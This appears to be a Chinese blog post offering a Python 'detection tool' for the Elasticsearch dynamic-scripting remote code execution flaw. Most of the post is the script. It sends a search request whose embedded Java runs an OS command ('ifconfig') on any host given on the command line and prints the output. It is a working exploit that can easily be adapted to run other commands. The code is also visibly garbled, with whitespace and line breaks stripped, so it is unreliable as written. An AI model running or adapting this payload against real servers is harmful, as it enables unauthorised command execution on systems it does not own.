[更新]Elasticsearch 代码执行漏洞利用检测工具

1.概述

2.
漏洞利用

3.
检测工具

ElasticSearch漏洞检测工具，如下图所示：

python检测代码：

#!/usr/bin/envpython
#-*-coding:UTF-8-*-
__description__="""
detail：http://p2j.cn/?p=1300
solution:http://bouk.co/blog/elasticsearch-rce/"""
__author__='JekkayHu'importurllib2defcheckit(domain):
ifnot(str(domain)).startswith('http'):
url='http://'+domain
else:
url=domain
ifurl.endswith('/'):
url=url.rstrip('/')payload=":9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;import%20java.io.*;String%20str%20=%20\\%22\\%22;BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().exec(\\%22ifconfig\\%22).getInputStream()));StringBuilder%20sb%20=%20new%20StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();%22}}}"
url+=payload
try:
#url='http://www.baidu.com/'
headers={"User-Agent":"Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1"}
req=urllib2.Request(url,headers=headers)
response=urllib2.urlopen(req,timeout=20)
html=response.read()ifnothtml:
return
ifstr(html).find('\"exp\"')>=0:
return[1,html]
exceptException,e:
passif__name__=='__main__':
importsys
iflen(sys.argv)<=1:
print"Usage:python20140523Elasticsearch.py1.2.3.411.22.33.44"
foriinxrange(1,len(sys.argv)):
info=checkit(sys.argv[i])
ifinfo:
print"server[%s]isvulable,returndata:[%s]"%(sys.argv[i],info[1])

elasticsearch漏洞检测工具下载地址：

http://download.csdn.net/detail/hujkay/7402093